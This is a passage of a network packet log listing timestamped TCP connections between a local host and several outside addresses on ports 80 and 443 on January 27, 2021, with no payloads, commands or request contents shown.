                                                    Jan 27, 2021 15:15:04.365257978 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.365268946 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.365298986 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.411149979 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.411181927 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.411195993 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.411212921 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.411230087 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.411246061 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.411263943 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.411278963 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.411295891 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.411315918 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.411334038 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.411338091 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.411350965 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.411369085 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.411386013 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.411401033 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.411412954 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.411452055 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.412110090 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.412136078 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.412157059 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.412177086 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.412189007 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.412193060 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.412210941 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.412221909 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.412226915 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.412244081 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.412246943 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.412261963 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.412271976 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.412278891 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.412298918 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.412316084 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.412322998 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.412333965 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.412349939 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.412359953 CET4972180192.168.2.3193.239.147.103
Jan 27, 2021 15:15:04.412365913 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.412381887 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.412388086 CET | 49721 | 80 | 192.168.2.3 | 193.239.147.103
Jan 27, 2021 15:15:04.412399054 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.412415028 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.412432909 CET | 49721 | 80 | 192.168.2.3 | 193.239.147.103
Jan 27, 2021 15:15:04.412434101 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.412450075 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.412458897 CET | 49721 | 80 | 192.168.2.3 | 193.239.147.103
Jan 27, 2021 15:15:04.412467003 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.412483931 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.412499905 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.412499905 CET | 49721 | 80 | 192.168.2.3 | 193.239.147.103
Jan 27, 2021 15:15:04.412517071 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.412532091 CET | 49721 | 80 | 192.168.2.3 | 193.239.147.103
Jan 27, 2021 15:15:04.412534952 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.412552118 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.412559032 CET | 49721 | 80 | 192.168.2.3 | 193.239.147.103
Jan 27, 2021 15:15:04.412571907 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.412590027 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.412591934 CET | 49721 | 80 | 192.168.2.3 | 193.239.147.103
Jan 27, 2021 15:15:04.412602901 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.412620068 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.412636042 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.412653923 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.412671089 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.412688017 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.412693977 CET | 49721 | 80 | 192.168.2.3 | 193.239.147.103
Jan 27, 2021 15:15:04.412739992 CET | 49721 | 80 | 192.168.2.3 | 193.239.147.103
Jan 27, 2021 15:15:04.458673954 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.458702087 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.458714962 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.458728075 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.458745003 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.458764076 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.458781004 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.458796024 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.458801985 CET | 49721 | 80 | 192.168.2.3 | 193.239.147.103
Jan 27, 2021 15:15:04.458808899 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.458827972 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.458844900 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.458861113 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.458878040 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.458898067 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.458914042 CET | 49721 | 80 | 192.168.2.3 | 193.239.147.103
Jan 27, 2021 15:15:04.458918095 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.458965063 CET | 49721 | 80 | 192.168.2.3 | 193.239.147.103
Jan 27, 2021 15:15:04.459568024 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.459585905 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.459602118 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.459618092 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.459635019 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.459645987 CET | 49721 | 80 | 192.168.2.3 | 193.239.147.103
Jan 27, 2021 15:15:04.459652901 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.459702969 CET | 49721 | 80 | 192.168.2.3 | 193.239.147.103
Jan 27, 2021 15:15:04.460072041 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.460144997 CET | 49721 | 80 | 192.168.2.3 | 193.239.147.103
Jan 27, 2021 15:15:04.460150003 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.460171938 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.460190058 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.460242033 CET | 49721 | 80 | 192.168.2.3 | 193.239.147.103
Jan 27, 2021 15:15:04.460314989 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.460338116 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.460354090 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.460372925 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.460387945 CET | 49721 | 80 | 192.168.2.3 | 193.239.147.103
Jan 27, 2021 15:15:04.460388899 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.460407019 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.460426092 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.460428953 CET | 49721 | 80 | 192.168.2.3 | 193.239.147.103
Jan 27, 2021 15:15:04.460445881 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.460464001 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.460480928 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.460494041 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.460519075 CET | 49721 | 80 | 192.168.2.3 | 193.239.147.103
Jan 27, 2021 15:15:04.460525990 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.460546017 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.460562944 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.460580111 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.460582018 CET | 49721 | 80 | 192.168.2.3 | 193.239.147.103
Jan 27, 2021 15:15:04.460597038 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.460617065 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.460637093 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.460645914 CET | 49721 | 80 | 192.168.2.3 | 193.239.147.103
Jan 27, 2021 15:15:04.460654020 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.460670948 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.460685968 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.460690022 CET | 49721 | 80 | 192.168.2.3 | 193.239.147.103
Jan 27, 2021 15:15:04.460702896 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.460720062 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.460752010 CET | 49721 | 80 | 192.168.2.3 | 193.239.147.103
Jan 27, 2021 15:15:04.460802078 CET | 49721 | 80 | 192.168.2.3 | 193.239.147.103
Jan 27, 2021 15:15:04.508176088 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.508219957 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.508259058 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.508327007 CET | 49721 | 80 | 192.168.2.3 | 193.239.147.103
Jan 27, 2021 15:15:04.508337021 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.508388042 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.508433104 CET | 49721 | 80 | 192.168.2.3 | 193.239.147.103
Jan 27, 2021 15:15:04.508443117 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.508481979 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.508519888 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.508558989 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.508564949 CET | 49721 | 80 | 192.168.2.3 | 193.239.147.103
Jan 27, 2021 15:15:04.508596897 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.508635998 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.508663893 CET | 49721 | 80 | 192.168.2.3 | 193.239.147.103
Jan 27, 2021 15:15:04.508673906 CET | 49721 | 80 | 192.168.2.3 | 193.239.147.103
Jan 27, 2021 15:15:04.508675098 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.508724928 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.508739948 CET | 49721 | 80 | 192.168.2.3 | 193.239.147.103
Jan 27, 2021 15:15:04.508769035 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.508806944 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.508845091 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.508845091 CET | 49721 | 80 | 192.168.2.3 | 193.239.147.103
Jan 27, 2021 15:15:04.508883953 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.508919001 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.508951902 CET | 49721 | 80 | 192.168.2.3 | 193.239.147.103
Jan 27, 2021 15:15:04.508965015 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.508979082 CET | 49721 | 80 | 192.168.2.3 | 193.239.147.103
Jan 27, 2021 15:15:04.509007931 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.509056091 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.509076118 CET | 49721 | 80 | 192.168.2.3 | 193.239.147.103
Jan 27, 2021 15:15:04.509099007 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.509136915 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.509174109 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.509190083 CET | 49721 | 80 | 192.168.2.3 | 193.239.147.103
Jan 27, 2021 15:15:04.509212017 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.509248972 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.509258986 CET | 49721 | 80 | 192.168.2.3 | 193.239.147.103
Jan 27, 2021 15:15:04.509287119 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.509325027 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.509327888 CET | 49721 | 80 | 192.168.2.3 | 193.239.147.103
Jan 27, 2021 15:15:04.509372950 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.509427071 CET | 49721 | 80 | 192.168.2.3 | 193.239.147.103
Jan 27, 2021 15:15:04.509442091 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.509480953 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.509526968 CET | 49721 | 80 | 192.168.2.3 | 193.239.147.103
Jan 27, 2021 15:15:04.509527922 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.509567022 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.509599924 CET | 49721 | 80 | 192.168.2.3 | 193.239.147.103
Jan 27, 2021 15:15:04.509603977 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.509651899 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.509694099 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.509701967 CET | 49721 | 80 | 192.168.2.3 | 193.239.147.103
Jan 27, 2021 15:15:04.509784937 CET | 49721 | 80 | 192.168.2.3 | 193.239.147.103
Jan 27, 2021 15:15:04.510025978 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.510080099 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.510118008 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.510154963 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.510159969 CET | 49721 | 80 | 192.168.2.3 | 193.239.147.103
Jan 27, 2021 15:15:04.510194063 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.510231018 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.510231972 CET | 49721 | 80 | 192.168.2.3 | 193.239.147.103
Jan 27, 2021 15:15:04.510278940 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.510307074 CET | 49721 | 80 | 192.168.2.3 | 193.239.147.103
Jan 27, 2021 15:15:04.510322094 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.510361910 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.510400057 CET | 49721 | 80 | 192.168.2.3 | 193.239.147.103
Jan 27, 2021 15:15:04.510401011 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.510441065 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.510477066 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.510479927 CET | 49721 | 80 | 192.168.2.3 | 193.239.147.103
Jan 27, 2021 15:15:04.510514975 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.510550976 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.510551929 CET | 49721 | 80 | 192.168.2.3 | 193.239.147.103
Jan 27, 2021 15:15:04.510608912 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.510627031 CET | 49721 | 80 | 192.168.2.3 | 193.239.147.103
Jan 27, 2021 15:15:04.510653019 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.510689974 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.510735035 CET | 49721 | 80 | 192.168.2.3 | 193.239.147.103
Jan 27, 2021 15:15:04.510735989 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.510776997 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.510811090 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.510812044 CET | 49721 | 80 | 192.168.2.3 | 193.239.147.103
Jan 27, 2021 15:15:04.510849953 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.510886908 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.510896921 CET | 49721 | 80 | 192.168.2.3 | 193.239.147.103
Jan 27, 2021 15:15:04.510922909 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.510960102 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.510961056 CET | 49721 | 80 | 192.168.2.3 | 193.239.147.103
Jan 27, 2021 15:15:04.510998011 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.511039019 CET | 49721 | 80 | 192.168.2.3 | 193.239.147.103
Jan 27, 2021 15:15:04.511048079 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.511091948 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.511126995 CET | 49721 | 80 | 192.168.2.3 | 193.239.147.103
Jan 27, 2021 15:15:04.511136055 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.511179924 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.511209011 CET | 49721 | 80 | 192.168.2.3 | 193.239.147.103
Jan 27, 2021 15:15:04.511217117 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.511254072 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.511291027 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.511298895 CET | 49721 | 80 | 192.168.2.3 | 193.239.147.103
Jan 27, 2021 15:15:04.511328936 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.511374950 CET | 49721 | 80 | 192.168.2.3 | 193.239.147.103
Jan 27, 2021 15:15:04.511377096 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.511411905 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.511478901 CET | 49721 | 80 | 192.168.2.3 | 193.239.147.103
Jan 27, 2021 15:15:12.834208012 CET | 49721 | 80 | 192.168.2.3 | 193.239.147.103
Jan 27, 2021 15:15:13.012614012 CET | 49730 | 443 | 192.168.2.3 | 151.101.0.133
Jan 27, 2021 15:15:13.055445910 CET | 443 | 49730 | 151.101.0.133 | 192.168.2.3
Jan 27, 2021 15:15:13.055532932 CET | 49730 | 443 | 192.168.2.3 | 151.101.0.133
Jan 27, 2021 15:15:13.082458973 CET | 49730 | 443 | 192.168.2.3 | 151.101.0.133
Jan 27, 2021 15:15:13.126568079 CET | 443 | 49730 | 151.101.0.133 | 192.168.2.3
Jan 27, 2021 15:15:13.126647949 CET | 443 | 49730 | 151.101.0.133 | 192.168.2.3
Jan 27, 2021 15:15:13.126682043 CET | 443 | 49730 | 151.101.0.133 | 192.168.2.3
Jan 27, 2021 15:15:13.126734972 CET | 49730 | 443 | 192.168.2.3 | 151.101.0.133
Jan 27, 2021 15:15:13.145935059 CET | 49730 | 443 | 192.168.2.3 | 151.101.0.133
Jan 27, 2021 15:15:13.150422096 CET | 49731 | 443 | 192.168.2.3 | 151.101.0.133
Jan 27, 2021 15:15:13.188869953 CET | 443 | 49730 | 151.101.0.133 | 192.168.2.3
Jan 27, 2021 15:15:13.192898035 CET | 443 | 49731 | 151.101.0.133 | 192.168.2.3
Jan 27, 2021 15:15:13.192995071 CET | 49731 | 443 | 192.168.2.3 | 151.101.0.133
Jan 27, 2021 15:15:13.193727970 CET | 49731 | 443 | 192.168.2.3 | 151.101.0.133
Jan 27, 2021 15:15:13.236875057 CET | 443 | 49731 | 151.101.0.133 | 192.168.2.3
Jan 27, 2021 15:15:13.237226009 CET | 443 | 49731 | 151.101.0.133 | 192.168.2.3
Jan 27, 2021 15:15:13.237251043 CET | 443 | 49731 | 151.101.0.133 | 192.168.2.3
Jan 27, 2021 15:15:13.237329960 CET | 49731 | 443 | 192.168.2.3 | 151.101.0.133
Jan 27, 2021 15:15:13.239945889 CET | 49731 | 443 | 192.168.2.3 | 151.101.0.133
Jan 27, 2021 15:15:13.243701935 CET | 49732 | 443 | 192.168.2.3 | 151.101.0.133
Jan 27, 2021 15:15:13.282432079 CET | 443 | 49731 | 151.101.0.133 | 192.168.2.3
Jan 27, 2021 15:15:13.288918972 CET | 443 | 49732 | 151.101.0.133 | 192.168.2.3
Jan 27, 2021 15:15:13.289066076 CET | 49732 | 443 | 192.168.2.3 | 151.101.0.133
Jan 27, 2021 15:15:13.290317059 CET | 49732 | 443 | 192.168.2.3 | 151.101.0.133
Jan 27, 2021 15:15:13.332880974 CET | 443 | 49732 | 151.101.0.133 | 192.168.2.3
Jan 27, 2021 15:15:13.336129904 CET | 443 | 49732 | 151.101.0.133 | 192.168.2.3
Jan 27, 2021 15:15:13.336520910 CET | 443 | 49732 | 151.101.0.133 | 192.168.2.3
Jan 27, 2021 15:15:13.336616039 CET | 49732 | 443 | 192.168.2.3 | 151.101.0.133
Jan 27, 2021 15:15:13.343419075 CET | 49732 | 443 | 192.168.2.3 | 151.101.0.133
Jan 27, 2021 15:15:13.345854998 CET | 49733 | 443 | 192.168.2.3 | 151.101.0.133
Jan 27, 2021 15:15:13.386022091 CET | 443 | 49732 | 151.101.0.133 | 192.168.2.3
Jan 27, 2021 15:15:13.388273954 CET | 443 | 49733 | 151.101.0.133 | 192.168.2.3
Jan 27, 2021 15:15:13.388403893 CET | 49733 | 443 | 192.168.2.3 | 151.101.0.133
Jan 27, 2021 15:15:13.389684916 CET | 49733 | 443 | 192.168.2.3 | 151.101.0.133
Jan 27, 2021 15:15:13.432136059 CET | 443 | 49733 | 151.101.0.133 | 192.168.2.3
Jan 27, 2021 15:15:13.432163000 CET | 443 | 49733 | 151.101.0.133 | 192.168.2.3
Jan 27, 2021 15:15:13.432178974 CET | 443 | 49733 | 151.101.0.133 | 192.168.2.3
Jan 27, 2021 15:15:13.432251930 CET | 49733 | 443 | 192.168.2.3 | 151.101.0.133
Jan 27, 2021 15:15:13.435597897 CET | 49733 | 443 | 192.168.2.3 | 151.101.0.133
Jan 27, 2021 15:15:13.483647108 CET | 443 | 49733 | 151.101.0.133 | 192.168.2.3
Jan 27, 2021 15:15:13.985789061 CET | 49734 | 80 | 192.168.2.3 | 147.75.47.199
Jan 27, 2021 15:15:14.141225100 CET | 80 | 49734 | 147.75.47.199 | 192.168.2.3
Jan 27, 2021 15:15:14.141433954 CET | 49734 | 80 | 192.168.2.3 | 147.75.47.199
Jan 27, 2021 15:15:14.142913103 CET | 49734 | 80 | 192.168.2.3 | 147.75.47.199
Jan 27, 2021 15:15:14.300801039 CET | 80 | 49734 | 147.75.47.199 | 192.168.2.3
Jan 27, 2021 15:15:14.300822020 CET | 80 | 49734 | 147.75.47.199 | 192.168.2.3
Jan 27, 2021 15:15:14.300829887 CET | 80 | 49734 | 147.75.47.199 | 192.168.2.3
Jan 27, 2021 15:15:14.301477909 CET | 49734 | 80 | 192.168.2.3 | 147.75.47.199
Jan 27, 2021 15:15:14.301492929 CET | 49734 | 80 | 192.168.2.3 | 147.75.47.199
Jan 27, 2021 15:15:14.459307909 CET | 80 | 49734 | 147.75.47.199 | 192.168.2.3
Jan 27, 2021 15:15:15.574553013 CET | 49735 | 443 | 192.168.2.3 | 151.101.0.133
Jan 27, 2021 15:15:15.617335081 CET | 443 | 49735 | 151.101.0.133 | 192.168.2.3
Jan 27, 2021 15:15:15.617430925 CET | 49735 | 443 | 192.168.2.3 | 151.101.0.133
Jan 27, 2021 15:15:15.618047953 CET | 49735 | 443 | 192.168.2.3 | 151.101.0.133
Jan 27, 2021 15:15:15.661521912 CET | 443 | 49735 | 151.101.0.133 | 192.168.2.3
Jan 27, 2021 15:15:15.661550999 CET | 443 | 49735 | 151.101.0.133 | 192.168.2.3
Jan 27, 2021 15:15:15.661566019 CET | 443 | 49735 | 151.101.0.133 | 192.168.2.3
Jan 27, 2021 15:15:15.661636114 CET | 49735 | 443 | 192.168.2.3 | 151.101.0.133
Jan 27, 2021 15:15:15.663796902 CET | 49735 | 443 | 192.168.2.3 | 151.101.0.133
